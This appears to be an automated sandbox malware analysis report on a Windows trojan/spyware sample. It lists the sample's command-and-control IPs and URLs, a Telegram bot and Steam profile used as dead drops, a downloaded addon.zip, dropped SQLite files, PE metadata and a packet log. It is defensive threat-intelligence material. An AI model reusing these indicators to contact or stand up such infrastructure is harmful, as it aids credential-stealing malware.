                      NameMaliciousAntivirus DetectionReputation
                      https://t.me/looking_glassbotfalse
                        high
                        http://188.34.154.187:30303/667e85c8112da056f901292caf82b3edfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://steamcommunity.com/profiles/76561199508624021false
                          high
                          http://188.34.154.187:30303/addon.zipfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://188.34.154.187:30303/false
                          • Avira URL Cloud: safe
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          https://duckduckgo.com/chrome_newtab06625899.exe, 00000000.00000003.404854797.00000000031BF000.00000004.00000020.00020000.00000000.sdmp, 22919964096183665961703616.0.dr, 50764714324176067669882221.0.drfalse
                            high
                            https://t.me/06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://188.34.154.187:30303;06625899.exe, 00000000.00000002.412969264.00000000025C5000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              low
                              https://t.me/looking_glassbotJ06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://duckduckgo.com/ac/?q=50764714324176067669882221.0.drfalse
                                  high
                                  https://www.google.com/images/branding/product/ico/googleg_lodp.ico06625899.exe, 00000000.00000003.404854797.00000000031BF000.00000004.00000020.00020000.00000000.sdmp, 22919964096183665961703616.0.dr, 50764714324176067669882221.0.drfalse
                                    high
                                    http://188.34.154.187:3030306625899.exe, 00000000.00000003.402473646.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412969264.00000000025C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://188.34.154.187:30303/:06625899.exe, 00000000.00000002.412555113.00000000008DC000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://ctldl.windowsup30303/667e85c8112da056f901292caf82b3ed06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://188.34.154.187:30303//06625899.exe, 00000000.00000002.413121737.0000000003160000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • 1%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://188.34.154.187:30303/addon.zip=u&y06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://188.34.154.187:30303/n06625899.exe, 00000000.00000002.413121737.0000000003160000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://188.34.154.187:30303/667e85c8112da056f901292caf82b3edZ506625899.exe, 00000000.00000002.412555113.00000000008DC000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://search.yahoo.com?fr=crmas_sfpf06625899.exe, 00000000.00000003.404854797.00000000031BF000.00000004.00000020.00020000.00000000.sdmp, 22919964096183665961703616.0.dr, 50764714324176067669882221.0.drfalse
                                      high
                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=50764714324176067669882221.0.drfalse
                                        high
                                        https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search06625899.exe, 00000000.00000003.404854797.00000000031BF000.00000004.00000020.00020000.00000000.sdmp, 22919964096183665961703616.0.dr, 50764714324176067669882221.0.drfalse
                                          high
                                          http://23.88.46.113/667e85c8112da056f901292caf82b3ed806625899.exe, 00000000.00000002.412555113.00000000008CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://23.88.46.113/667e85c8112da056f901292caf82b3edx06625899.exe, 00000000.00000002.412555113.00000000008CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://188.34.154.187:30303/e506625899.exe, 00000000.00000002.412555113.00000000008DC000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://23.88.46.113:8A06625899.exe, 00000000.00000002.412510711.0000000000838000.00000040.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          low
                                          https://t.me/looking_glassbotC06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=06625899.exe, 00000000.00000003.404854797.00000000031BF000.00000004.00000020.00020000.00000000.sdmp, 22919964096183665961703616.0.dr, 50764714324176067669882221.0.drfalse
                                              high
                                              https://freebl3.dllmozglue.dllmsvcp140.dllnss3.dllsoftokn3.dllvcruntime140.dll06625899.exe, 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 06625899.exe, 00000000.00000003.355865725.0000000002380000.00000004.00001000.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://ac.ecosia.org/autocomplete?q=50764714324176067669882221.0.drfalse
                                                high
                                                https://search.yahoo.com?fr=crmas_sfp06625899.exe, 00000000.00000003.404854797.00000000031BF000.00000004.00000020.00020000.00000000.sdmp, 22919964096183665961703616.0.dr, 50764714324176067669882221.0.drfalse
                                                  high
                                                  http://188.34.154.187:30303/T06625899.exe, 00000000.00000002.413121737.0000000003160000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://t.me/V06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://23.88.46.113/667e85c8112da056f901292caf82b3ed06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://23.88.46.113:8006625899.exe, 06625899.exe, 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 06625899.exe, 00000000.00000003.355865725.0000000002380000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://188.34.154.187:30303/CVOHV.xlsx06625899.exe, 00000000.00000002.413121737.00000000031BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://23.88.46.113:80/06625899.exe, 00000000.00000002.412969264.00000000025C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://23.88.46.113:80peppppzxc.ziphttps://t.me/looking_glassbotlookataddon.zipMozilla/5.006625899.exe, 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 06625899.exe, 00000000.00000003.355865725.0000000002380000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    low
                                                    http://188.34.154.187:30303/addon.zip&u;y06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=50764714324176067669882221.0.drfalse
                                                      high
                                                      http://188.34.154.187:30303/addon.zip006625899.exe, 00000000.00000003.404755514.00000000008F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.sqlite.org/copyright.html.06625899.exe, 00000000.00000002.423731237.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.415215690.000000000DF12000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://steamcommunity.com/profiles/76561199508624021openopen_NULL%s06625899.exe, 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 06625899.exe, 00000000.00000003.355865725.0000000002380000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          high
                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs
                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          188.34.154.187
                                                          unknownGermany
                                                          24940HETZNER-ASDEfalse
                                                          149.154.167.99
                                                          t.meUnited Kingdom
                                                          62041TELEGRAMRUfalse
                                                          23.88.46.113
                                                          unknownUnited States
                                                          18978ENZUINC-USfalse
                                                          Joe Sandbox Version:37.1.0 Beryl
                                                          Analysis ID:877001
                                                          Start date and time:2023-05-28 10:45:08 +02:00
                                                          Joe Sandbox Product:CloudBasic
                                                          Overall analysis duration:0h 5m 56s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:light
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                          Number of analysed new started processes analysed:3
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • HDC enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample file name:06625899.exe
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.evad.winEXE@1/4@1/3
                                                          EGA Information:Failed
                                                          HDC Information:
                                                          • Successful, ratio: 30.2% (good quality ratio 27.9%)
                                                          • Quality average: 72.1%
                                                          • Quality standard deviation: 31.8%
                                                          HCA Information:
                                                          • Successful, ratio: 100%
                                                          • Number of executed functions: 0
                                                          • Number of non-executed functions: 0
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Stop behavior analysis, all processes terminated
                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, conhost.exe
                                                          • TCP Packets have been reduced to 100
                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, ctldl.windowsupdate.com
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          TimeTypeDescription
                                                          10:46:24API Interceptor1x Sleep call for process: 06625899.exe modified
                                                          No context
                                                          No context
                                                          No context
                                                          No context
                                                          No context
                                                          Process:C:\Users\user\Desktop\06625899.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                          Category:dropped
                                                          Size (bytes):94208
                                                          Entropy (8bit):1.2882898331044472
                                                          Encrypted:false
                                                          SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                          MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                          SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                          SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                          SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                          Malicious:false
                                                          Reputation:high, very likely benign file
                                                          Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\06625899.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):49152
                                                          Entropy (8bit):0.7876734657715041
                                                          Encrypted:false
                                                          SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                          MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                          SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                          SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                          SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                          Malicious:false
                                                          Reputation:high, very likely benign file
                                                          Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\06625899.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                          Category:dropped
                                                          Size (bytes):94208
                                                          Entropy (8bit):1.2882898331044472
                                                          Encrypted:false
                                                          SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                          MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                          SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                          SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                          SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                          Malicious:false
                                                          Reputation:high, very likely benign file
                                                          Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\06625899.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 17, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 17
                                                          Category:dropped
                                                          Size (bytes):28672
                                                          Entropy (8bit):1.4755077381471955
                                                          Encrypted:false
                                                          SSDEEP:96:oesz0Rwhba5DX1tHQOd0AS4mcAMmgAU7MxTWbKSS:o+RwE55tHQOKB4mcmgAU7MxTWbNS
                                                          MD5:DEE86123FE48584BA0CE07793E703560
                                                          SHA1:E80D87A2E55A95BC937AC24525E51AE39D635EF7
                                                          SHA-256:60DB12643ECF5B13E6F05E0FBC7E0453D073E0929412E39428D431DB715122C8
                                                          SHA-512:65649B808C7AB01A65D18BF259BF98A4E395B091D17E49849573275B7B93238C3C9D1E5592B340ABCE3195F183943CA8FB18C1C6C2B5974B04FE99FCCF582BFB
                                                          Malicious:false
                                                          Reputation:high, very likely benign file
                                                          Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):7.134474155007553
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:06625899.exe
                                                          File size:404992
                                                          MD5:22cd094d925fb41f446ed4db24cc8c35
                                                          SHA1:c316b3fa0e1357ed5815002b0354e8503d5ee038
                                                          SHA256:9edb64bf310212bffcc2fa176b22b570d071fb38873292a1a1ada19f8536231c
                                                          SHA512:606163e06f58b8fa1003ca0aa9a8a30344fc49fe20259beda6ae6fb006f7a1440ac61a8ed7a79a64ac802618613943119fb7b2289718a341edf19f3a7fceb895
                                                          SSDEEP:6144:QY/jZT7vRNMKOO3PFmc7rPZWM5khCVYPnZe+QSdixrmwVUTtiKG:Qq5hOOMc7fLVYPnZ3QSd8yFTtib
                                                          TLSH:40847D1392A1BD40E9664F769E1FC6E8761EF5708F593B69322CBA1F48700F2D263B11
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&...b...b...b...|.......|.......|...H...EX..k...b.......|...c...|...c...|...c...Richb...................PE..L......a...........
                                                          Icon Hash:514145494155691d
                                                          Entrypoint:0x404e59
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x61FA08E2 [Wed Feb 2 04:30:26 2022 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:0
                                                          File Version Major:5
                                                          File Version Minor:0
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:0
                                                          Import Hash:2d9ed3462f8a74bfd1231e2e9de56b43
                                                          Instruction
                                                          call 00007F5B55084253h
                                                          jmp 00007F5B5507F8EDh
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          mov ecx, dword ptr [esp+04h]
                                                          test ecx, 00000003h
                                                          je 00007F5B5507FA96h
                                                          mov al, byte ptr [ecx]
                                                          add ecx, 01h
                                                          test al, al
                                                          je 00007F5B5507FAC0h
                                                          test ecx, 00000003h
                                                          jne 00007F5B5507FA61h
                                                          add eax, 00000000h
                                                          lea esp, dword ptr [esp+00000000h]
                                                          lea esp, dword ptr [esp+00000000h]
                                                          mov eax, dword ptr [ecx]
                                                          mov edx, 7EFEFEFFh
                                                          add edx, eax
                                                          xor eax, FFFFFFFFh
                                                          xor eax, edx
                                                          add ecx, 04h
                                                          test eax, 81010100h
                                                          je 00007F5B5507FA5Ah
                                                          mov eax, dword ptr [ecx-04h]
                                                          test al, al
                                                          je 00007F5B5507FAA4h
                                                          test ah, ah
                                                          je 00007F5B5507FA96h
                                                          test eax, 00FF0000h
                                                          je 00007F5B5507FA85h
                                                          test eax, FF000000h
                                                          je 00007F5B5507FA74h
                                                          jmp 00007F5B5507FA3Fh
                                                          lea eax, dword ptr [ecx-01h]
                                                          mov ecx, dword ptr [esp+04h]
                                                          sub eax, ecx
                                                          ret
                                                          lea eax, dword ptr [ecx-02h]
                                                          mov ecx, dword ptr [esp+04h]
                                                          sub eax, ecx
                                                          ret
                                                          lea eax, dword ptr [ecx-03h]
                                                          mov ecx, dword ptr [esp+04h]
                                                          sub eax, ecx
                                                          ret
                                                          lea eax, dword ptr [ecx-04h]
                                                          mov ecx, dword ptr [esp+04h]
                                                          sub eax, ecx
                                                          ret
                                                          mov edi, edi
                                                          push ebp
                                                          mov ebp, esp
                                                          sub esp, 20h
                                                          mov eax, dword ptr [ebp+08h]
                                                          push esi
                                                          push edi
                                                          push 00000008h
                                                          pop ecx
                                                          mov esi, 004012D8h
                                                          lea edi, dword ptr [ebp-20h]
                                                          rep movsd
                                                          mov dword ptr [ebp-08h], eax
                                                          mov eax, dword ptr [ebp+0Ch]
                                                          pop edi
                                                          mov dword ptr [ebp-04h], eax
                                                          pop esi
                                                          Programming Language:
                                                          • [ASM] VS2008 build 21022
                                                          • [ C ] VS2008 build 21022
                                                          • [C++] VS2008 build 21022
                                                          • [IMP] VS2005 build 50727
                                                          • [RES] VS2008 build 21022
                                                          • [LNK] VS2008 build 21022
                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x445a80x64.text
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x28c0000x19398.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x2a60000xde4.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x12200x1c.text
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x31500x40.text
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x10000x1d4.text
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000x4406a0x44200False0.8737528669724771data7.818078308305934IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .data0x460000x2458440x1e00unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc0x28c0000x193980x19400False0.37881922957920794data4.263849351344956IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0x2a60000x34500x3600False0.2173755787037037data2.4461769922107117IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                          NameRVASizeTypeLanguageCountry
                                                          RT_ICON0x28c7300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0
                                                          RT_ICON0x28d5d80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0
                                                          RT_ICON0x28de800x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0
                                                          RT_ICON0x2904280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0
                                                          RT_ICON0x2914d00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0
                                                          RT_ICON0x2919880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0
                                                          RT_ICON0x2928300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0
                                                          RT_ICON0x2930d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0
                                                          RT_ICON0x2936400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0
                                                          RT_ICON0x295be80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0
                                                          RT_ICON0x296c900x988Device independent bitmap graphic, 24 x 48 x 32, image size 0
                                                          RT_ICON0x2976180x468Device independent bitmap graphic, 16 x 32 x 32, image size 0
                                                          RT_ICON0x297ae80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0
                                                          RT_ICON0x2989900x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0
                                                          RT_ICON0x2992380x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0
                                                          RT_ICON0x2999000x568Device independent bitmap graphic, 16 x 32 x 8, image size 0
                                                          RT_ICON0x299e680x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0
                                                          RT_ICON0x29c4100x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0
                                                          RT_ICON0x29d4b80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0
                                                          RT_ICON0x29d9880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0
                                                          RT_ICON0x29e8300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0
                                                          RT_ICON0x29f0d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0
                                                          RT_ICON0x29f6400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0
                                                          RT_ICON0x2a1be80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0
                                                          RT_ICON0x2a2c900x988Device independent bitmap graphic, 24 x 48 x 32, image size 0
                                                          RT_ICON0x2a36180x468Device independent bitmap graphic, 16 x 32 x 32, image size 0
                                                          RT_STRING0x2a3d200x664data
                                                          RT_STRING0x2a43880x59edata
                                                          RT_STRING0x2a49280x29adata
                                                          RT_STRING0x2a4bc80x248data
                                                          RT_STRING0x2a4e100x582data
                                                          RT_GROUP_ICON0x2a3a800x68data
                                                          RT_GROUP_ICON0x2919380x4cdata
                                                          RT_GROUP_ICON0x29d9200x68data
                                                          RT_GROUP_ICON0x297a800x68data
                                                          RT_VERSION0x2a3ae80x238data
                                                          DLLImport
                                                          KERNEL32.dllGetModuleHandleW, IsBadReadPtr, GetConsoleAliasesLengthA, WaitForMultipleObjectsEx, GetPrivateProfileIntA, FreeConsole, GetVersionExW, WritePrivateProfileStructW, MulDiv, GetModuleFileNameW, CreateActCtxA, WritePrivateProfileStringW, ReplaceFileA, GetStringTypeExA, GetStdHandle, GetLogicalDriveStringsA, OpenMutexW, GetLastError, ReadConsoleOutputCharacterA, GetProcAddress, AttachConsole, SleepEx, VirtualAlloc, _hwrite, LoadLibraryA, InterlockedExchangeAdd, LocalAlloc, GetFileType, CreateFileMappingW, FindFirstVolumeMountPointW, GetNumberFormatW, CreateEventW, GetModuleFileNameA, lstrcmpiW, GetModuleHandleA, CreateMutexA, GetFileAttributesExW, GetConsoleCursorInfo, ScrollConsoleScreenBufferA, GetCurrentThreadId, FindAtomW, EnumResourceLanguagesW, DebugBreak, FindNextVolumeA, AddConsoleAliasW, CancelWaitableTimer, GetCommState, WaitForSingleObject, GetLongPathNameA, GetCommandLineA, GetStartupInfoA, RaiseException, RtlUnwind, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, HeapFree, WideCharToMultiByte, SetHandleCount, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, Sleep, ExitProcess, WriteFile, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, InterlockedDecrement, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, HeapReAlloc, SetFilePointer, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, InitializeCriticalSectionAndSpinCount, HeapSize, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, FlushFileBuffers, CreateFileA, CloseHandle
                                                          USER32.dllCharLowerBuffA
                                                          GDI32.dllGetCharWidthW, EnumFontsW, GetCharABCWidthsFloatW
                                                          ADVAPI32.dllMapGenericMask
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          May 28, 2023 10:46:01.248292923 CEST4967980192.168.2.323.88.46.113
                                                          May 28, 2023 10:46:04.249680996 CEST4967980192.168.2.323.88.46.113
                                                          May 28, 2023 10:46:10.250323057 CEST4967980192.168.2.323.88.46.113
                                                          May 28, 2023 10:46:22.357672930 CEST49684443192.168.2.3149.154.167.99
                                                          May 28, 2023 10:46:22.357745886 CEST44349684149.154.167.99192.168.2.3
                                                          May 28, 2023 10:46:22.357866049 CEST49684443192.168.2.3149.154.167.99
                                                          May 28, 2023 10:46:22.375677109 CEST49684443192.168.2.3149.154.167.99
                                                          May 28, 2023 10:46:22.375749111 CEST44349684149.154.167.99192.168.2.3
                                                          May 28, 2023 10:46:22.448298931 CEST44349684149.154.167.99192.168.2.3
                                                          May 28, 2023 10:46:22.448596954 CEST49684443192.168.2.3149.154.167.99
                                                          May 28, 2023 10:46:22.651189089 CEST49684443192.168.2.3149.154.167.99
                                                          May 28, 2023 10:46:22.651254892 CEST44349684149.154.167.99192.168.2.3
                                                          May 28, 2023 10:46:22.651915073 CEST44349684149.154.167.99192.168.2.3
                                                          May 28, 2023 10:46:22.651990891 CEST49684443192.168.2.3149.154.167.99
                                                          May 28, 2023 10:46:22.655484915 CEST49684443192.168.2.3149.154.167.99
                                                          May 28, 2023 10:46:22.691979885 CEST44349684149.154.167.99192.168.2.3
                                                          May 28, 2023 10:46:22.692039967 CEST44349684149.154.167.99192.168.2.3
                                                          May 28, 2023 10:46:22.692131042 CEST44349684149.154.167.99192.168.2.3
                                                          May 28, 2023 10:46:22.692161083 CEST49684443192.168.2.3149.154.167.99
                                                          May 28, 2023 10:46:22.692228079 CEST44349684149.154.167.99192.168.2.3
                                                          May 28, 2023 10:46:22.692233086 CEST49684443192.168.2.3149.154.167.99
                                                          May 28, 2023 10:46:22.692368984 CEST49684443192.168.2.3149.154.167.99
                                                          May 28, 2023 10:46:22.696513891 CEST49684443192.168.2.3149.154.167.99
                                                          May 28, 2023 10:46:22.696552992 CEST44349684149.154.167.99192.168.2.3
                                                          May 28, 2023 10:46:22.732084990 CEST4968530303192.168.2.3188.34.154.187
                                                          May 28, 2023 10:46:22.754019022 CEST3030349685188.34.154.187192.168.2.3
